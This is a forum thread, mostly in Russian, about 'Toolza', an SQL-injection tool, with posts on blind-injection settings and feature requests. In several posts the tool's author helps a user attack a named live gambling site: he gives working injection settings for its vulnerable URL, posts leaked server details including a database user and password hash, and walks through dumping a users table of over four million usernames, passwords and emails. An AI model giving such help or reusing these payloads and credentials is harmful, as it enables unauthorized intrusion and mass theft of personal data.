Toolza 1.0

Discussion in 'PHP' started by Pashkela, 17 Oct 2009.

  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    да было бы здорово если пашкела реализует функцию инжекта через куки и хедер
     
  2. ZAV

    ZAV New Member

    Joined:
    6 May 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    на мой взгляд очень облегчает жизнь при хеке очень понравилось
     
    1 person likes this.
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:======>download

    Исправлены существенные ошибки в floor(rand()) методе, теперь ничего не пропускает и работает как положено.
     
    1 person likes this.
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:======>download

    Добавлены некоторые возможности в Blind-sql inj для различных ситуаций:

    Code:
    ################################################################################
    ## Blind SQL-injection настройки | Blind SQL-injection settings##
    ################################################################################
    $bl_mode = 0; # mode of blind sql injection:
    #-----------------------------------------------------------------------------------------------------------------
    # mode 0 example - http://site.com/index.php?id=1+and+substring(version(),1,1)=5--+
    #in script:
    #$bl_url = "http://site.com/index.php?id=1";
    #$bl_filtr = "--+";
    #$bl_plus = "+";
    #$bl_error = "here_wrong_message";
    #$bl_error_type = 0;
    #-----------------------------------------------------------------------------------------------------------------
    # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2))
    #in script:
    #$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
    #$bl_filtr = "),1,(select+1+union+select+2))";
    #$bl_plus = "+";
    #$bl_error = "here_wrong_message";
    #$bl_error_type = 0;
    #-----------------------------------------------------------------------------------------------------------------
    
    т.е. если у вас так или иначе в рабочем запросе присутствует "substring(version( ),1,1)=5" (ну 5 тут понятно, меняется) - то можно юзать в тулзе независимо от навороченности конструкции

    PS: Можно было бы сделать и проще, без разных режимов, но сделал добавление только из расчета того, чтобы юзеры, которые пользовали прогу раньше, не путались
     
    #244 Pashkela, 28 May 2010
    Last edited: 28 May 2010
  5. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    на днях раскручивал тулзой блинд.
    бага: парочку букв нашлось неверно, некоторые оказались = ? возможно это связано с глюками потоков. раньше, через [LFI/Reader/Load_file() - unvisual error when wrong query] замечал глюк с неверным отображением найденного файла, пример вывода:
    ====================================
    //etc/passwd
    ====================================
    мусор
    ====================================
    //logs/error.log
    ====================================
    данные из /etc/passwd

    какой-то подозрительный нюанс :)
    тулза делает так:
    GET http://site/path ...
    а браузеры так:
    GET /path ...

    предложение фичи
    учитывая, что интересуют нас обычно строго определенные значения таблиц и полей, и то, что блинд занимает туеву хучу трафика и логов, можно добавить условие в выборку [на имя колонок, на имена таблиц], по типу:

    условие на колонку = pass
    =>
    select column_name from information_schema.columns where instr(lower(column_name), 0x70617373) > 0;

    + предопределенные условия на
    table_schema != information_schema
    table_schema != mysql [ее доступность вообще одним отдельным запросом проверять]

    предложение фичи [непринципиально, но уж точно полезно :) ]
    сделать сохранение уже сграбленных данных для последующего использования, а то при каждом новом выборе в меню часто грабятся сначала те же данные, что уже и были сграблены.
     
  6. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    более подозрительный нюанс это 100500тыщ записей в логе )))
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Иногда это связано с фактической стабильностью соединения с сайтом (именно поэтому не стал внедрять sleep метод, кто часто крутит блинду - поймет почему, способ вообще нерабочий на практике в 50% случаев, а то и больше), иногда с шириной вашего интернет канала, иногда потому что луна светит ярче обычного. А иногда и от кол-ва потоков, еще раз напоминаю - 10 максимум, глюки - уменьшать кол-во потоков, в блинде фаст мод юзать только на локалхосте, в остальных случаях - нормал. POST безопаснее чем GET, но и, опять же по практике - более глючный (как раз касается моментов, когда данные пропускаются или заменяются на какую-нибудь фигню)

    Работает? Работает. Вывод - так тоже можно. Т.е. не грузись по этому поводу.

    так и есть, с самого начала, вы просто не знаете, как это юзать, очевидно. Указывайте нужные вам таблицы/колонки ручками - и будет вам счастье. Ааа, дошло, вам like подавай. Удобная фича, но пока нет

    Чего? Все пишется в файло на любом этапе (*nix), в Win - только после завершения задачи.
    Одни и теже данные не грабятся, это гонево.

    Кому нравится крутить блинду ручками - у нас свободная страна)
     
    #247 Pashkela, 17 Jun 2010
    Last edited: 17 Jun 2010
  8. roxblnfk

    roxblnfk Elder - Старейшина

    Joined:
    6 Feb 2010
    Messages:
    189
    Likes Received:
    42
    Reputations:
    19
    Насколько я помню, в документации HTTP указано по этому поводу, что допускаются и полные ссылки. В этом случае можно избегать или игнорировать заголовок HOST, поскольку домен уже указан в URI.
     
  9. emmy

    emmy Member

    Joined:
    12 Oct 2009
    Messages:
    76
    Likes Received:
    17
    Reputations:
    8
    В стандарте http1.1 указано, что полный uri обязателен при работе через прокси. Но вполне может быть, что автор тулзы приверженец карго-культа и его это не волнует.
     
  10. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Hi

    i am using this tool and it is very nice but here is one problem i want to extract specific DATABASE data but i can not do that how can i do that please help me

    and i want to extract users and it is 4Million users so any fast Dumper or Tool for extract fastly if have please share me


    Thanks
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Write an example here
     
  12. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Vulnerable link

    http://slingogaming.com/slingo_casino_news-story.php?id=-1+UNION+SELECT+1--


    Database : phase8
    Table : users
    columns : username : password : email


    i want to extract this Database Data but i can not extract from Toolza

    And this users data is 4Million Data and i want to extract fast if any good method so i can extract fast

    please solve this problem

    Thank you
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    What's the problem? Settings in toolza.pl:

    Code:
    $method = 1;
    $source_sql = "http://slingogaming.com/slingo_casino_news-story.php?id=-1+UNION+SELECT+^";
    $filtr = "--";
    $plus = "+";
    $limit = 0; 
    $unhex = 0; 
    $aes = 0;  
    $aes_key = "0x71";
    
    results:
    Code:
    System information:
    ----------------------
    ver:5.0.27-max
    base:slingo_db
    user:[email protected]
    basedir:/
    datadir:/var/lib/mysql/
    tmpdir:/tmp/
    os:pc-linux-gnu
    mysql.user:phpuser
    mysql.password:36684d606dccb590
    file_priv:Y
    
    
    Tables in information_schema.tables - 294
    
     
  14. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    yes it is working file but problem is that i can not extract specific Database like this DATABASE

    Database : phase8
    Table : users
    columns : username : password : email


    how can i extract its Database Columns Data

    Thank you
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Choose mode:
    ----------------------------------------------------------
    [1] Mysql inj system information
    [2] Mysql inj get DB-names from information_schema.schemata
    [3] Mysql inj get tables from DB-name
    [4] Mysql inj get column_name from tables from DB-name
    [5] Mysql inj get tables from information_schema (current DB)
    [6] Mysql inj get column_name from table (current DB)
    [7] Mysql inj get data from columns
    [8] Mysql inj brute tables & columns
    [9] Mysql inj column number bruter
    [10] Mysql inj Blind
    [11] Mysql inj NAME_CONST
    [12] Mysql inj floor(rand())
    ----------------------------------------------------------
    [13] Main menu
    ----------------------------------------------------------
    7
    Your choice: 7
    -----------------------------------------
    Enter the table_name: phase8.users
    -----------------------------------------
    MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): 0
    Table: phase8.users
    ----------
    -----------------------------------------
    Enter the column(s) name(s) - for example - id or id,username,user_password:
    username,password,email
    Dump column(s): [ username,password,email ] from [ phase8.users ]
    -----------------------------------------
    Do you want add condition to sql-query?
    ----------
    for example - where id=1, where username=admin (no quotes) ? (1/0):If no condition - ENTER or 0 here
    ----------
    Count data from [ phase8.users ]
    4172356
    ----------
    Get ALL data from phase8.users (4172356) ? (1/0): 0
    Enter START_position: 0
    Enter END_position: 1
    Dump records from [0] to [1]
    ----------------------
    ......data here.......
     
    #255 Pashkela, 18 Jun 2010
    Last edited: 18 Jun 2010
  16. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    =>
    нет, я про
    [10] Mysql inj Blind =>
    [3] Blind inj get tables from DB-name
    [4] Blind inj get column_name from tables from DB-name
    [6] Blind Get tables from information_schema (current DB)
    [7] Blind Get column_name from table (current DB)

    зачем грабить все колонки и таблицы, если можно условием ограничить их выбор - вхождение нужной подстроки в имя колонки или имя таблицы

    [6] Blind Get tables from information_schema (current DB)
    =>
    Your choice: 6
    -----------------------------------
    Count tables NOT in information_schema [length]:2
    33
    ------------------------------------------------------
    Count tables NOT in information_schema [value]:33
    -------------------------------------------------------
    Fri Jun 18 11:14:25 2010
    -----------------------------------
    Normal MODE - records > 10
    Fast MODE - records <= 10
    -----------------------------------------
    Get ALL tables (33) ? (1/0): 0
    Enter START_position: 1
    Enter END_position: 5
    Dump records from [1] to [5]
    -----------------------------------------
    ...
    нужных мне данных не оказалось, выбираю по новой
    [6] Blind Get tables from information_schema (current DB)
    опять идет грабание данных
    [опредление
    Count tables NOT in information_schema [length]:2
    Count tables NOT in information_schema [value]:33
    ]
    , которые уже были до этого сграбаны, а можно было бы просто запомнить и использовать уже готовые с предыдущего выбора


    [кстати, как ты в твоей предыдущей мессаге вывод скрин консоли снимал ? я в винде через выделение через [Изменить]->[Пометить], но возможно есть более удобные фичи или программы, которые автоматом сохраняют весь вывод консоли в файл ?]
     
    #256 DrakonHaSh, 18 Jun 2010
    Last edited: 18 Jun 2010
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Просто выделить и скопировать. Как из браузера. Ми делал в бубунте.

    Тут принцип limit, если с первой - то

    Enter START_position: 0

    А. Теперь понятно. Ну да, так бы было правильнее конечно. Только если ты не знаешь ГДЕ именно (под каким номером) твоя таблица - смысл дампить кусками? Увидел нужную в итоге - прервал прогу. Т.е. просто запустить гет алл тэйблс. Т.е. чото логику недопонимаю такого кусочного дергания в данном случае.

    ну это like и есть, в тулзе пока этого нет
     
    #257 Pashkela, 18 Jun 2010
    Last edited: 18 Jun 2010
  18. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    problem solved Thank you very much
     
  19. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    если таблиц очень много, то времени и трафика это занимает дофигище. я иногда смотрю кусками.
    насчет прерывать - в винде в таком случае не сохраняется лог.

    [у тебя похоже привычка считать собеседника немножко дауном ? если кто-то что-то как-то :) делает, то у него есть для этого объективная причина. хотя, возможно, ты привык к "попугаям", которые не понимают того, чего делают :) но какой смысл каждого по дефолту принимать именно за него ;) ? ]
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ничего подобного. Просто у меня такая манера общения (кстати перечитал посты - чото наездов или чего-то еще оскорбительного по отношению к тебе не увидел). Наверное ты так воспринимаешь просто.

    PS: Заранее всех уважаю и прошу прощения у тех, кого ненароком обидел/задел

    PPSS: Просто это не прога на продажу, и уж если хотите получить правильный ответ сразу - просьба выкладывать МАКСИМАЛЬНО иноформацию по интересующей вас проблеме, а не растягивать на несколько постов, заставляя меня думать, что вам собственно нужно вообще в итоге.
     
    #260 Pashkela, 18 Jun 2010
    Last edited: 18 Jun 2010